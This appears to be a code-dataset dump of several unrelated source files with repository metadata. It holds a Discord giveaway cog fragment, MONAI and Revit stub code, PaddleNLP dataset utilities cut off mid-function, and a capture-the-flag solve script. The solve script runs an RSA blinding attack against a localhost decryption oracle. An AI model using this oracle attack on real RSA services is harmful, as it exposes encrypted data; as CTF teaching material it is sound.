f"Showing default requirements in giveaway embeds has been {'enabled' if not current else 'disabled'}."
)
@gset.command(name="unreactdm", aliases=["urdm"])
@commands.admin_or_permissions(administrator=True)
async def gset_urdm(self, ctx: commands.Context, status: bool):
"""
Set whether the user is informed when their reaction is removed from a giveaway message.
"""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.unreactdm.set(status)
await ctx.reply(
"The user will be dmed if their reaction is removed from the giveaway."
if status == True
else "The user will not be dm'ed when their reaction is removed."
)
@gset.command(name="showsettings", aliases=["ss", "show", "showset"])
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_show(self, ctx):
"""
        See the giveaway settings configured for your server."""
settings = await get_guild_settings(ctx.guild.id)
message = settings.msg
tmsg = settings.tmsg
emoji = settings.emoji
winnerdm = settings.winnerdm
hostdm = settings.hostdm
endmsg = settings.endmsg
managers = settings.manager
autodelete = settings.autodelete
color = discord.Color(settings.color) if settings.color else await ctx.embed_color()
show_defaults = settings.show_defaults
embed = discord.Embed(
title=f"Giveaway Settings for **__{ctx.guild.name}__**",
description=f"""
**Giveaway Managers:** {humanize_list([ctx.guild.get_role(manager).mention for manager in managers if ctx.guild.get_role(manager)]) if managers else "No managers set. Requires manage message permission or bot's mod role."}
**Message:** {message}
**Reaction Emoji:** {emoji}
**Will the winner be dm'ed?:** {winnerdm}
**Will the host be dm'ed?:** {hostdm}
**Will users be dmed if their reaction is removed?:** {settings.unreactdm}
**Auto delete Giveaway Commands?:** {autodelete}
**Embed color: **{color}
**Show defaults in giveaway embed?: **{show_defaults}
**Giveaway Thank message:** {box(tmsg)}
**Giveaway Ending message:** {box(endmsg)}\n
""",
color=color,
)
embed.set_footer(text=ctx.guild.name, icon_url=ctx.guild.icon_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
await ctx.send(embed=embed)
| 40.590129
| 222
| 0.614433
|
20794bb8094ef25c92834e59328a484528ce2701
| 708
|
py
|
Python
|
crypto/rocket-ship-academy/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | 3
|
2021-07-25T11:01:21.000Z
|
2022-03-28T13:31:36.000Z
|
crypto/rocket-ship-academy/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | null | null | null |
crypto/rocket-ship-academy/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | null | null | null |
from Crypto.Util.number import long_to_bytes
from pwn import *
from decimal import *
import re
getcontext().prec = 100000000
pattern = "n = (\d+)\ne = (\d+)\nc = (\d+)"
conn = remote('localhost', '12345')
received = conn.recv().decode()
matches = re.search(pattern, received)
n, e, c = int(matches[1]), int(matches[2]), int(matches[3])
print('n =', n)
print('e =', e)
print('c =', c)
print()
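# Blinding step: RSA is multiplicatively homomorphic, so (c * s^e)^d = m * s (mod n)
# for any blinding factor s. With s = 2 the decryption oracle returns 2*m mod n,
# and halving that value recovers the original message m.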
ciphertext = Decimal(c) * ((2 ** Decimal(e)) % Decimal(n)) % Decimal(n)
print('Ciphertext:', ciphertext)
conn.send(str(ciphertext) + '\r\n')
received = conn.recv().decode()
matches = re.search("Decrypted: (\d+)\n", received)
decrypted = int(matches[1])
print()
print(long_to_bytes(decrypted // 2))
| 21.454545
| 71
| 0.649718
|
6753cafcb0b4c296f3309ce45bfc1ec85949ba53
| 3,569
|
py
|
Python
|
monai/handlers/classification_saver.py
|
RobinCamarasa/MONAI
|
8207e1e2a3555ddc3fe938e058552651900dc951
|
[
"Apache-2.0"
] | null | null | null |
monai/handlers/classification_saver.py
|
RobinCamarasa/MONAI
|
8207e1e2a3555ddc3fe938e058552651900dc951
|
[
"Apache-2.0"
] | null | null | null |
monai/handlers/classification_saver.py
|
RobinCamarasa/MONAI
|
8207e1e2a3555ddc3fe938e058552651900dc951
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import TYPE_CHECKING, Callable, Optional
from monai.data import CSVSaver
from monai.utils import exact_version, optional_import
Events, _ = optional_import("ignite.engine", "0.4.2", exact_version, "Events")
if TYPE_CHECKING:
from ignite.engine import Engine
else:
Engine, _ = optional_import("ignite.engine", "0.4.2", exact_version, "Engine")
class ClassificationSaver:
"""
Event handler triggered on completing every iteration to save the classification predictions as CSV file.
"""
def __init__(
self,
output_dir: str = "./",
filename: str = "predictions.csv",
overwrite: bool = True,
batch_transform: Callable = lambda x: x,
output_transform: Callable = lambda x: x,
name: Optional[str] = None,
) -> None:
"""
Args:
output_dir: output CSV file directory.
filename: name of the saved CSV file name.
            overwrite: whether to overwrite existing CSV file content. If not overwriting,
                we check whether the results have been previously saved, and load them into the prediction_dict.
            batch_transform: a callable that is used to transform the
                ignite.engine.batch into the expected format from which the meta_data dictionary is extracted.
            output_transform: a callable that is used to transform the
                ignite.engine.output into the expected model prediction data.
The first dimension of this transform's output will be treated as the
batch dimension. Each item in the batch will be saved individually.
name: identifier of logging.logger to use, defaulting to `engine.logger`.
"""
self.saver = CSVSaver(output_dir, filename, overwrite)
self.batch_transform = batch_transform
self.output_transform = output_transform
self.logger = logging.getLogger(name)
self._name = name
def attach(self, engine: Engine) -> None:
"""
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
if self._name is None:
self.logger = engine.logger
if not engine.has_event_handler(self, Events.ITERATION_COMPLETED):
engine.add_event_handler(Events.ITERATION_COMPLETED, self)
if not engine.has_event_handler(self.saver.finalize, Events.COMPLETED):
engine.add_event_handler(Events.COMPLETED, lambda engine: self.saver.finalize())
def __call__(self, engine: Engine) -> None:
"""
This method assumes self.batch_transform will extract metadata from the input batch.
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
meta_data = self.batch_transform(engine.state.batch)
engine_output = self.output_transform(engine.state.output)
self.saver.save_batch(engine_output, meta_data)
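# Hedged usage sketch (illustrative only, not part of the original MONAI module):
# it shows how this handler is commonly wired into an Ignite evaluation loop.
# The batch/output key names ("image", "image_meta_dict", "pred") and the dummy
# step function are assumptions made purely for demonstration; running it
# requires ignite to be installed.
def _example_attach_classification_saver():
    def _eval_step(engine, batch):
        # Stand-in inference step that simply echoes the batch back as output.
        return {"pred": batch["image"], "image_meta_dict": batch["image_meta_dict"]}
    evaluator = Engine(_eval_step)
    saver = ClassificationSaver(
        output_dir="./",
        filename="predictions.csv",
        batch_transform=lambda batch: batch["image_meta_dict"],
        output_transform=lambda output: output["pred"],
    )
    # Registers this handler on ITERATION_COMPLETED and finalizes the CSV on COMPLETED.
    saver.attach(evaluator)
    return evaluator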
| 43
| 110
| 0.680863
|
6f4596a91b7cf14aed7afbaf0f821f8a0848dd26
| 1,100
|
py
|
Python
|
release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/BentFabricWiresOrientation.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/BentFabricWiresOrientation.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/BentFabricWiresOrientation.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
class BentFabricWiresOrientation(Enum, IComparable, IFormattable, IConvertible):
"""
Bent Fabric wires orientation.
enum BentFabricWiresOrientation,values: Down (0),Up (1)
"""
def __eq__(self, *args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self, *args):
pass
def __gt__(self, *args):
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args):
pass
def __lt__(self, *args):
pass
def __ne__(self, *args):
pass
def __reduce_ex__(self, *args):
pass
def __str__(self, *args):
pass
Down = None
Up = None
value__ = None
| 23.913043
| 221
| 0.566364
|
b9b6b0ef084d754f6d29a03cd11c16ae3e033395
| 29,054
|
py
|
Python
|
applications/neural_search/recall/domain_adaptive_pretraining/data_tools/dataset_utils.py
|
SunYanCN/PaddleNLP
|
31deea6c989f399b4552ee711d9f7d62768d645f
|
[
"Apache-2.0"
] | null | null | null |
applications/neural_search/recall/domain_adaptive_pretraining/data_tools/dataset_utils.py
|
SunYanCN/PaddleNLP
|
31deea6c989f399b4552ee711d9f7d62768d645f
|
[
"Apache-2.0"
] | null | null | null |
applications/neural_search/recall/domain_adaptive_pretraining/data_tools/dataset_utils.py
|
SunYanCN/PaddleNLP
|
31deea6c989f399b4552ee711d9f7d62768d645f
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors, and NVIDIA, and PaddlePaddle Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Most of the code here has been copied from:
# https://github.com/google-research/albert/blob/master/create_pretraining_data.py
# with some modifications.
import math
import os
import re
import time
import collections
from itertools import accumulate
import numpy as np
import paddle
import paddle.distributed.fleet as fleet
print_rank_0 = print
#from megatron.data.indexed_dataset import make_dataset as make_indexed_dataset
COMPILED = False
DSET_TYPE_BERT = 'standard_bert'
DSET_TYPE_T5 = 't5'
DSET_TYPE_ERNIE = 'ernie'
DSET_TYPES = [DSET_TYPE_BERT, DSET_TYPE_T5, DSET_TYPE_ERNIE]
class MMapIndexedDataset(paddle.io.Dataset):
def __init__(self, path, skip_warmup=False):
super().__init__()
self._path = path
# All documment ids, extend as 1-D array.
for suffix in ["_ids.npy", "_idx.npz"]:
if not os.path.isfile(path + suffix):
raise ValueError("File Not found, %s" % (path + suffix))
self._token_ids = np.load(
path + "_ids.npy", mmap_mode="r", allow_pickle=True)
process_data = np.load(path + "_idx.npz")
self._sizes = process_data["lens"]
self._pointers = process_data["sents"]
self._doc_idx = process_data["docs"]
def __getstate__(self):
return self._path
def __len__(self):
return len(self._sizes)
# @lru_cache(maxsize=8)
def __getitem__(self, idx):
if isinstance(idx, int):
size = self._sizes[idx]
ptr = self._pointers[idx]
np_array = self._token_ids[ptr:ptr + size]
return np_array
elif isinstance(idx, slice):
start, stop, step = idx.indices(len(self))
if step != 1:
raise ValueError(
"Slices into indexed_dataset must be contiguous")
ptr = self._pointers[start]
sizes = self._sizes[idx]
offsets = list(accumulate(sizes))
total_size = sum(sizes)
np_array = self._token_ids[ptr:ptr + total_size]
sents = np.split(np_array, offsets[:-1])
return sents
def get(self, idx, offset=0, length=None):
""" Retrieves a single item from the dataset with the option to only
return a portion of the item.
get(idx) is the same as [idx] but get() does not support slicing.
"""
size = self._sizes[idx]
ptr = self._pointers[idx]
if length is None:
length = size - offset
ptr += offset
        np_array = self._token_ids[ptr:ptr + length]
return np_array
@property
def sizes(self):
return self._sizes
@property
def doc_idx(self):
return self._doc_idx
def get_doc_idx(self):
return self._doc_idx
def set_doc_idx(self, doc_idx_):
self._doc_idx = doc_idx_
def make_indexed_dataset(data_prefix, data_impl=None, skip_warmup=False):
return MMapIndexedDataset(data_prefix)
def compile_helper():
"""Compile helper function ar runtime. Make sure this
is invoked on a single process."""
import os
import subprocess
path = os.path.abspath(os.path.dirname(__file__))
ret = subprocess.run(['make', '-C', path])
if ret.returncode != 0:
print("Making C++ dataset helpers module failed, exiting.")
import sys
sys.exit(1)
def get_a_and_b_segments(sample, np_rng):
"""Divide sample into a and b segments."""
# Number of sentences in the sample.
n_sentences = len(sample)
# Make sure we always have two sentences.
assert n_sentences > 1, 'make sure each sample has at least two sentences.'
# First part:
# `a_end` is how many sentences go into the `A`.
a_end = 1
if n_sentences >= 3:
        # Note that randint in numpy is exclusive of the upper bound.
a_end = np_rng.randint(1, n_sentences)
tokens_a = []
for j in range(a_end):
tokens_a.extend(sample[j])
# Second part:
tokens_b = []
for j in range(a_end, n_sentences):
tokens_b.extend(sample[j])
# Random next:
is_next_random = False
if np_rng.random() < 0.5:
is_next_random = True
tokens_a, tokens_b = tokens_b, tokens_a
return tokens_a, tokens_b, is_next_random
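# Hedged worked example for get_a_and_b_segments: the A/B boundary and the
# possible swap are random, but every token of the sample is preserved.
# Not called anywhere; run it manually to check.
def _example_get_a_and_b_segments():
    sample = [[1, 2], [3], [4, 5]]
    tokens_a, tokens_b, is_next_random = get_a_and_b_segments(sample, np.random)
    assert sorted(tokens_a + tokens_b) == [1, 2, 3, 4, 5]
    assert isinstance(is_next_random, bool)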
def truncate_segments(tokens_a, tokens_b, len_a, len_b, max_num_tokens, np_rng):
"""Truncates a pair of sequences to a maximum sequence length."""
#print(len_a, len_b, max_num_tokens)
assert len_a > 0
if len_a + len_b <= max_num_tokens:
return False
while len_a + len_b > max_num_tokens:
if len_a > len_b:
len_a -= 1
tokens = tokens_a
else:
len_b -= 1
tokens = tokens_b
if np_rng.random() < 0.5:
del tokens[0]
else:
tokens.pop()
return True
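# Hedged worked example for truncate_segments: the pair below starts at a
# combined length of 7 and is trimmed in place, one token per iteration, until
# it fits max_num_tokens. Which side loses tokens is random, but the final
# combined length is deterministic. Not called anywhere; run it manually to check.
def _example_truncate_segments():
    tokens_a, tokens_b = [1, 2, 3, 4], [5, 6, 7]
    truncated = truncate_segments(tokens_a, tokens_b, len(tokens_a), len(tokens_b),
                                  max_num_tokens=5, np_rng=np.random)
    assert truncated is True
    assert len(tokens_a) + len(tokens_b) == 5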
def create_tokens_and_tokentypes(tokens_a, tokens_b, cls_id, sep_id):
"""Merge segments A and B, add [CLS] and [SEP] and build tokentypes."""
tokens = []
tokentypes = []
# [CLS].
tokens.append(cls_id)
tokentypes.append(0)
# Segment A.
for token in tokens_a:
tokens.append(token)
tokentypes.append(0)
# [SEP].
tokens.append(sep_id)
tokentypes.append(0)
# Segment B.
for token in tokens_b:
tokens.append(token)
tokentypes.append(1)
if tokens_b:
# [SEP].
tokens.append(sep_id)
tokentypes.append(1)
return tokens, tokentypes
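# Hedged worked example for create_tokens_and_tokentypes (illustrative ids only):
# segment A gets token type 0 and segment B gets token type 1, with [CLS]/[SEP]
# inserted as in BERT. Not called anywhere; run it manually to check.
def _example_create_tokens_and_tokentypes():
    tokens, tokentypes = create_tokens_and_tokentypes(
        tokens_a=[7, 8], tokens_b=[9], cls_id=101, sep_id=102)
    assert tokens == [101, 7, 8, 102, 9, 102]
    assert tokentypes == [0, 0, 0, 0, 1, 1]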
MaskedLmInstance = collections.namedtuple("MaskedLmInstance",
["index", "label"])
def is_start_piece(piece):
"""Check if the current word piece is the starting piece (BERT)."""
# When a word has been split into
# WordPieces, the first token does not have any marker and any subsequence
# tokens are prefixed with ##. So whenever we see the ## token, we
# append it to the previous set of word indexes.
return not piece.startswith("##")
def create_masked_lm_predictions(tokens,
vocab_id_list,
vocab_id_to_token_dict,
masked_lm_prob,
cls_id,
sep_id,
mask_id,
max_predictions_per_seq,
np_rng,
max_ngrams=3,
vocab_token_to_id_dict=None,
do_whole_word_mask=True,
favor_longer_ngram=False,
do_permutation=False,
geometric_dist=False,
to_chinese_char=False,
inplace_random_mask=False,
masking_style="bert"):
"""Creates the predictions for the masked LM objective.
Note: Tokens here are vocab ids and not text tokens."""
cand_indexes = []
# Note(mingdachen): We create a list for recording if the piece is
# the starting piece of current token, where 1 means true, so that
# on-the-fly whole word masking is possible.
token_boundary = [0] * len(tokens)
for (i, token) in enumerate(tokens):
if token == cls_id or token == sep_id:
token_boundary[i] = 1
continue
        # Whole Word Masking means that we mask all of the wordpieces
# corresponding to an original word.
#
# Note that Whole Word Masking does *not* change the training code
# at all -- we still predict each WordPiece independently, softmaxed
# over the entire vocabulary.
vocab_id = vocab_id_to_token_dict[token]
if (do_whole_word_mask and len(cand_indexes) >= 1 and
not is_start_piece(vocab_id)):
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
if is_start_piece(vocab_id_to_token_dict[token]):
token_boundary[i] = 1
if to_chinese_char:
char_tokens = []
assert vocab_token_to_id_dict is not None
for i, b in enumerate(token_boundary):
if b == 0:
vocab_id = vocab_id_to_token_dict[tokens[i]]
new_vocab_id = vocab_id[2:] if len(
re.findall('##[\u4E00-\u9FA5]', vocab_id)) > 0 else vocab_id
char_tokens.append(vocab_token_to_id_dict[new_vocab_id]
if new_vocab_id in vocab_token_to_id_dict
else token)
else:
char_tokens.append(tokens[i])
output_tokens = list(char_tokens)
else:
output_tokens = list(tokens)
masked_lm_positions = []
masked_lm_labels = []
if masked_lm_prob == 0:
return (output_tokens, masked_lm_positions, masked_lm_labels,
token_boundary)
num_to_predict = min(max_predictions_per_seq,
max(1, int(round(len(tokens) * masked_lm_prob))))
ngrams = np.arange(1, max_ngrams + 1, dtype=np.int64)
if not geometric_dist:
# Note(mingdachen):
        # By default, we set the probabilities to favor shorter ngram sequences.
pvals = 1. / np.arange(1, max_ngrams + 1)
pvals /= pvals.sum(keepdims=True)
if favor_longer_ngram:
pvals = pvals[::-1]
ngram_indexes = []
for idx in range(len(cand_indexes)):
ngram_index = []
for n in ngrams:
ngram_index.append(cand_indexes[idx:idx + n])
ngram_indexes.append(ngram_index)
np_rng.shuffle(ngram_indexes)
(masked_lms, masked_spans) = ([], [])
covered_indexes = set()
backup_output_tokens = list(output_tokens)
for cand_index_set in ngram_indexes:
if len(masked_lms) >= num_to_predict:
break
if not cand_index_set:
continue
# Note(mingdachen):
# Skip current piece if they are covered in lm masking or previous ngrams.
for index_set in cand_index_set[0]:
for index in index_set:
if index in covered_indexes:
continue
if not geometric_dist:
n = np_rng.choice(
ngrams[:len(cand_index_set)],
p=pvals[:len(cand_index_set)] /
pvals[:len(cand_index_set)].sum(keepdims=True))
else:
# Sampling "n" from the geometric distribution and clipping it to
# the max_ngrams. Using p=0.2 default from the SpanBERT paper
# https://arxiv.org/pdf/1907.10529.pdf (Sec 3.1)
n = min(np_rng.geometric(0.2), max_ngrams)
index_set = sum(cand_index_set[n - 1], [])
n -= 1
# Note(mingdachen):
# Repeatedly looking for a candidate that does not exceed the
# maximum number of predictions by trying shorter ngrams.
while len(masked_lms) + len(index_set) > num_to_predict:
if n == 0:
break
index_set = sum(cand_index_set[n - 1], [])
n -= 1
# If adding a whole-word mask would exceed the maximum number of
# predictions, then just skip this candidate.
if len(masked_lms) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
covered_indexes.add(index)
masked_token = None
if masking_style == "bert":
# 80% of the time, replace with [MASK]
if np_rng.random() < 0.8:
masked_token = mask_id
else:
# 10% of the time, keep original
if np_rng.random() < 0.5:
masked_token = output_tokens[index]
# 10% of the time, replace with random word
else:
if inplace_random_mask:
masked_token = backup_output_tokens[np_rng.randint(
0, len(output_tokens))]
else:
masked_token = vocab_id_list[np_rng.randint(
0, len(vocab_id_list))]
elif masking_style == "t5":
masked_token = mask_id
else:
raise ValueError("invalid value of masking style")
output_tokens[index] = masked_token
masked_lms.append(
MaskedLmInstance(
index=index, label=tokens[index]))
masked_spans.append(
MaskedLmInstance(
index=index_set, label=[tokens[index] for index in index_set]))
assert len(masked_lms) <= num_to_predict
np_rng.shuffle(ngram_indexes)
select_indexes = set()
if do_permutation:
for cand_index_set in ngram_indexes:
if len(select_indexes) >= num_to_predict:
break
if not cand_index_set:
continue
# Note(mingdachen):
# Skip current piece if they are covered in lm masking or previous ngrams.
for index_set in cand_index_set[0]:
for index in index_set:
if index in covered_indexes or index in select_indexes:
continue
n = np.random.choice(
ngrams[:len(cand_index_set)],
p=pvals[:len(cand_index_set)] /
pvals[:len(cand_index_set)].sum(keepdims=True))
index_set = sum(cand_index_set[n - 1], [])
n -= 1
while len(select_indexes) + len(index_set) > num_to_predict:
if n == 0:
break
index_set = sum(cand_index_set[n - 1], [])
n -= 1
# If adding a whole-word mask would exceed the maximum number of
# predictions, then just skip this candidate.
if len(select_indexes) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes or index in select_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
select_indexes.add(index)
assert len(select_indexes) <= num_to_predict
select_indexes = sorted(select_indexes)
permute_indexes = list(select_indexes)
np_rng.shuffle(permute_indexes)
orig_token = list(output_tokens)
for src_i, tgt_i in zip(select_indexes, permute_indexes):
output_tokens[src_i] = orig_token[tgt_i]
masked_lms.append(
MaskedLmInstance(
index=src_i, label=orig_token[src_i]))
masked_lms = sorted(masked_lms, key=lambda x: x.index)
# Sort the spans by the index of the first span
masked_spans = sorted(masked_spans, key=lambda x: x.index[0])
for p in masked_lms:
masked_lm_positions.append(p.index)
masked_lm_labels.append(p.label)
return (output_tokens, masked_lm_positions, masked_lm_labels,
token_boundary, masked_spans)
def pad_and_convert_to_numpy(tokens, tokentypes, masked_positions,
masked_labels, pad_id, max_seq_length):
"""Pad sequences and convert them to numpy."""
# Some checks.
num_tokens = len(tokens)
padding_length = max_seq_length - num_tokens
assert padding_length >= 0
assert len(tokentypes) == num_tokens
assert len(masked_positions) == len(masked_labels)
# Tokens and token types.
filler = [pad_id] * padding_length
tokens_np = np.array(tokens + filler, dtype=np.int64)
tokentypes_np = np.array(tokentypes + filler, dtype=np.int64)
# Padding mask.
padding_mask_np = np.array(
[1] * num_tokens + [0] * padding_length, dtype=np.int64)
# Lables and loss mask.
labels = [-1] * max_seq_length
loss_mask = [0] * max_seq_length
for i in range(len(masked_positions)):
assert masked_positions[i] < num_tokens
labels[masked_positions[i]] = masked_labels[i]
loss_mask[masked_positions[i]] = 1
labels_np = np.array(labels, dtype=np.int64)
loss_mask_np = np.array(loss_mask, dtype=np.int64)
return tokens_np, tokentypes_np, labels_np, padding_mask_np, loss_mask_np
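# Hedged worked example for pad_and_convert_to_numpy (illustrative ids only):
# a 4-token sequence padded out to length 6 with pad_id=0 and one masked
# position. Not called anywhere; run it manually to check.
def _example_pad_and_convert_to_numpy():
    tokens_np, tokentypes_np, labels_np, padding_mask_np, loss_mask_np = \
        pad_and_convert_to_numpy(tokens=[101, 7, 103, 102], tokentypes=[0, 0, 0, 0],
                                 masked_positions=[2], masked_labels=[8],
                                 pad_id=0, max_seq_length=6)
    assert tokens_np.tolist() == [101, 7, 103, 102, 0, 0]
    assert padding_mask_np.tolist() == [1, 1, 1, 1, 0, 0]
    assert labels_np.tolist() == [-1, -1, 8, -1, -1, -1]
    assert loss_mask_np.tolist() == [0, 0, 1, 0, 0, 0]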
def build_train_valid_test_datasets(data_prefix,
args,
tokenizer,
splits_string,
train_valid_test_num_samples,
max_seq_length,
masked_lm_prob,
short_seq_prob,
seed,
skip_warmup,
binary_head=False,
max_seq_length_dec=None,
dataset_type='standard_bert'):
if len(data_prefix) == 1:
return _build_train_valid_test_datasets(
data_prefix[0],
args,
tokenizer,
splits_string,
train_valid_test_num_samples,
max_seq_length,
masked_lm_prob,
short_seq_prob,
seed,
skip_warmup,
binary_head,
max_seq_length_dec,
dataset_type=dataset_type)
def _build_train_valid_test_datasets(data_prefix,
args,
tokenizer,
splits_string,
train_valid_test_num_samples,
max_seq_length,
masked_lm_prob,
short_seq_prob,
seed,
skip_warmup,
binary_head,
max_seq_length_dec,
dataset_type='standard_bert'):
if dataset_type not in DSET_TYPES:
raise ValueError("Invalid dataset_type: ", dataset_type)
# Indexed dataset.
indexed_dataset = get_indexed_dataset_(data_prefix, None, skip_warmup)
    # Get start and end indices of train/valid/test into doc-idx
    # Note that doc-idx is designed to be num-docs + 1 so we can
# easily iterate over it.
total_num_of_documents = indexed_dataset.doc_idx.shape[0] - 1
splits = get_train_valid_test_split_(splits_string, total_num_of_documents)
print(splits)
# Print stats about the splits.
print_rank_0(' > dataset split:')
def print_split_stats(name, index):
print_rank_0(' {}:'.format(name))
print_rank_0(' document indices in [{}, {}) total of {} '
'documents'.format(splits[index], splits[index + 1],
splits[index + 1] - splits[index]))
start_index = indexed_dataset.doc_idx[splits[index]]
end_index = indexed_dataset.doc_idx[splits[index + 1]]
print_rank_0(' sentence indices in [{}, {}) total of {} '
'sentences'.format(start_index, end_index, end_index -
start_index))
print_split_stats('train', 0)
print_split_stats('validation', 1)
print_split_stats('test', 2)
def build_dataset(index, name):
# from megatron.data.bert_dataset import BertDataset
# from megatron.data.t5_dataset import T5Dataset
from .ernie_dataset import ErnieDataset
dataset = None
if splits[index + 1] > splits[index]:
# Get the pointer to the original doc-idx so we can set it later.
doc_idx_ptr = indexed_dataset.get_doc_idx()
# Slice the doc-idx
start_index = splits[index]
# Add +1 so we can index into the dataset to get the upper bound.
end_index = splits[index + 1] + 1
# New doc_idx view.
indexed_dataset.set_doc_idx(doc_idx_ptr[start_index:end_index])
# Build the dataset accordingly.
kwargs = dict(
name=name,
data_prefix=data_prefix,
num_epochs=None,
max_num_samples=train_valid_test_num_samples[index],
max_seq_length=max_seq_length,
seed=seed,
share_folder=args.share_folder, )
if dataset_type == DSET_TYPE_T5:
dataset = T5Dataset(
indexed_dataset=indexed_dataset,
tokenizer=tokenizer,
masked_lm_prob=masked_lm_prob,
max_seq_length_dec=max_seq_length_dec,
short_seq_prob=short_seq_prob,
**kwargs)
elif dataset_type == DSET_TYPE_BERT:
dataset = BertDataset(
indexed_dataset=indexed_dataset,
tokenizer=tokenizer,
masked_lm_prob=masked_lm_prob,
short_seq_prob=short_seq_prob,
binary_head=binary_head,
**kwargs)
elif dataset_type == DSET_TYPE_ERNIE:
dataset = ErnieDataset(
indexed_dataset=indexed_dataset,
tokenizer=tokenizer, #ErnieTokenizer.from_pretrained("ernie-1.0"),
masked_lm_prob=masked_lm_prob,
short_seq_prob=short_seq_prob,
binary_head=binary_head,
**kwargs)
else:
raise NotImplementedError("Dataset type not fully implemented.")
# Set the original pointer so dataset remains the main dataset.
indexed_dataset.set_doc_idx(doc_idx_ptr)
# Checks.
assert indexed_dataset.doc_idx[0] == 0
assert indexed_dataset.doc_idx.shape[0] == \
(total_num_of_documents + 1)
return dataset
train_dataset = build_dataset(0, 'train')
valid_dataset = build_dataset(1, 'valid')
test_dataset = build_dataset(2, 'test')
return (train_dataset, valid_dataset, test_dataset)
def get_indexed_dataset_(data_prefix, data_impl, skip_warmup):
print_rank_0(' > building dataset index ...')
start_time = time.time()
indexed_dataset = make_indexed_dataset(data_prefix, data_impl, skip_warmup)
assert indexed_dataset.sizes.shape[0] == indexed_dataset.doc_idx[-1]
print_rank_0(' > finished creating indexed dataset in {:4f} '
'seconds'.format(time.time() - start_time))
print_rank_0(' > indexed dataset stats:')
print_rank_0(' number of documents: {}'.format(
indexed_dataset.doc_idx.shape[0] - 1))
print_rank_0(' number of sentences: {}'.format(
indexed_dataset.sizes.shape[0]))
return indexed_dataset
def get_train_valid_test_split_(splits_string, size):
""" Get dataset splits from comma or '/' separated string list."""
print(splits_string)
splits = []
if splits_string.find(',') != -1:
splits = [float(s) for s in splits_string.split(',')]
elif splits_string.find('/') != -1:
splits = [float(s) for s in splits_string.split('/')]
else:
splits = [float(splits_string)]
while len(splits) < 3:
splits.append(0.)
splits = splits[:3]
splits_sum = sum(splits)
assert splits_sum > 0.0
splits = [split / splits_sum for split in splits]
splits_index = [0]
for index, split in enumerate(splits):
splits_index.append(splits_index[index] + int(
round(split * float(size))))
diff = splits_index[-1] - size
for index in range(1, len(splits_index)):
splits_index[index] -= diff
assert len(splits_index) == 4
assert splits_index[-1] == size
return splits_index
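# Hedged worked example for get_train_valid_test_split_: a "949,50,1" split of
# 1000 documents yields the boundaries [0, 949, 999, 1000], i.e. documents
# [0, 949) for train, [949, 999) for validation and [999, 1000) for test.
# Not called anywhere; run it manually to check.
def _example_get_train_valid_test_split():
    assert get_train_valid_test_split_("949,50,1", 1000) == [0, 949, 999, 1000]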
def get_samples_mapping(indexed_dataset, data_prefix, num_epochs,
max_num_samples, max_seq_length, short_seq_prob, seed,
name, binary_head, share_folder):
"""Get a list that maps a sample index to a starting sentence index, end sentence index, and length"""
if not num_epochs:
if not max_num_samples:
raise ValueError("Need to specify either max_num_samples "
"or num_epochs")
num_epochs = np.iinfo(np.int32).max - 1
if not max_num_samples:
max_num_samples = np.iinfo(np.int64).max - 1
# Filename of the index mapping
indexmap_filename = data_prefix
indexmap_filename += '_{}_indexmap'.format(name)
if num_epochs != (np.iinfo(np.int32).max - 1):
indexmap_filename += '_{}ep'.format(num_epochs)
if max_num_samples != (np.iinfo(np.int64).max - 1):
indexmap_filename += '_{}mns'.format(max_num_samples)
indexmap_filename += '_{}msl'.format(max_seq_length)
indexmap_filename += '_{:0.2f}ssp'.format(short_seq_prob)
indexmap_filename += '_{}s'.format(seed)
indexmap_filename += '.npy'
local_rank = 0 if fleet.local_rank() is None else int(fleet.local_rank())
if share_folder:
